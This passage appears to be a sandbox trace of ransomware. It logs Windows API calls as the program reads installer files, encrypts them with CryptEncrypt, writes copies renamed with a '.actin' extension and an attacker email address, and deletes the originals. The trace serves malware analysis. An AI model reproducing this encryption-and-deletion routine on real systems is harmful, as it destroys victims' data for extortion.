pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e40) returned 1 [0046.234] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.234] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0046.234] CryptDestroyKey (hKey=0xf71e40) returned 1 [0046.234] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0046.234] CryptDestroyKey (hKey=0xf71b80) returned 1 [0046.234] CloseHandle (hObject=0x2e4) returned 1 [0046.234] CloseHandle (hObject=0x32c) returned 1 [0046.235] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 1 [0046.236] SetEvent (hEvent=0x2e8) returned 1 [0046.236] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.236] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.236] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18776) returned 1 [0046.236] CloseHandle (hObject=0x32c) returned 1 [0046.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 0x80 [0046.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.236] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.236] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.236] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.237] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.237] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ac0) returned 1 [0046.237] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.237] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4958, lpOverlapped=0x0) returned 1 [0046.244] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4960, dwBufLen=0x4960 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4960) returned 1 [0046.245] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4960, lpOverlapped=0x0) returned 1 [0046.246] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0046.246] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.246] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.246] CryptDestroyKey (hKey=0xf71b80) returned 1 [0046.246] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.246] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0046.246] CloseHandle (hObject=0x32c) returned 1 [0046.246] CloseHandle (hObject=0x2e4) returned 1 [0046.247] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 1 [0046.248] SetEvent (hEvent=0x2e8) returned 1 [0046.248] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.248] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.248] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=86284) returned 1 [0046.248] CloseHandle (hObject=0x2e4) returned 1 [0046.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 0x80 [0046.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.249] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.249] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.249] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.249] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.252] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71cc0) returned 1 [0046.253] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.253] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x1510c, lpOverlapped=0x0) returned 1 [0046.272] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x15110, dwBufLen=0x15110 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x15110) returned 1 [0046.272] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x15110, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x15110, lpOverlapped=0x0) returned 1 [0046.274] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71fc0) returned 1 [0046.275] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.275] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.275] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0046.275] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.275] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0046.275] CloseHandle (hObject=0x32c) returned 1 [0046.275] CloseHandle (hObject=0x300) returned 1 [0046.277] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 1 [0046.278] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.278] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.278] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=3188) returned 1 [0046.278] CloseHandle (hObject=0x300) returned 1 [0046.278] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 0x80 [0046.279] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.279] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.279] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.279] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.279] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.280] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72180) returned 1 [0046.280] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.280] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xc74, lpOverlapped=0x0) returned 1 [0046.282] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc80, dwBufLen=0xc80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc80) returned 1 [0046.282] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xc80, lpOverlapped=0x0) returned 1 [0046.283] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f40) returned 1 [0046.283] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.283] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0046.283] CryptDestroyKey (hKey=0xf71f40) returned 1 [0046.283] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0046.283] CryptDestroyKey (hKey=0xf72180) returned 1 [0046.283] CloseHandle (hObject=0x300) returned 1 [0046.283] CloseHandle (hObject=0x32c) returned 1 [0046.283] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 1 [0046.284] SetEvent (hEvent=0x2e8) returned 1 [0046.284] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.284] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.285] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=77232) returned 1 [0046.285] CloseHandle (hObject=0x32c) returned 1 [0046.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 0x80 [0046.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.285] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.285] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.285] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.285] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.285] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf720c0) returned 1 [0046.285] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.285] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x12db0, lpOverlapped=0x0) returned 1 [0046.523] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x12dc0, dwBufLen=0x12dc0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x12dc0) returned 1 [0046.524] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x12dc0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x12dc0, lpOverlapped=0x0) returned 1 [0046.526] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0046.526] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.526] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.526] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0046.526] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.526] CryptDestroyKey (hKey=0xf720c0) returned 1 [0046.526] CloseHandle (hObject=0x32c) returned 1 [0046.526] CloseHandle (hObject=0x300) returned 1 [0046.528] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 1 [0046.530] SetEvent (hEvent=0x2e8) returned 1 [0046.530] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.530] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.530] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18776) returned 1 [0046.530] CloseHandle (hObject=0x300) returned 1 [0046.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 0x80 [0046.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.530] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.530] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.530] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.530] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.531] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf720c0) returned 1 [0046.531] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.531] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4958, lpOverlapped=0x0) returned 1 [0046.532] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4960, dwBufLen=0x4960 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4960) returned 1 [0046.532] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4960, lpOverlapped=0x0) returned 1 [0046.533] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71fc0) returned 1 [0046.533] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.533] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.533] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0046.533] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.533] CryptDestroyKey (hKey=0xf720c0) returned 1 [0046.533] CloseHandle (hObject=0x300) returned 1 [0046.533] CloseHandle (hObject=0x32c) returned 1 [0046.534] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 1 [0046.535] SetEvent (hEvent=0x2e8) returned 1 [0046.535] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.535] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.535] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=6851) returned 1 [0046.535] CloseHandle (hObject=0x32c) returned 1 [0046.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 0x80 [0046.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.535] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.536] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.536] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.536] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.538] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71fc0) returned 1 [0046.538] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.538] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x1ac3, lpOverlapped=0x0) returned 1 [0046.539] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x1ad0, dwBufLen=0x1ad0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x1ad0) returned 1 [0046.539] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, 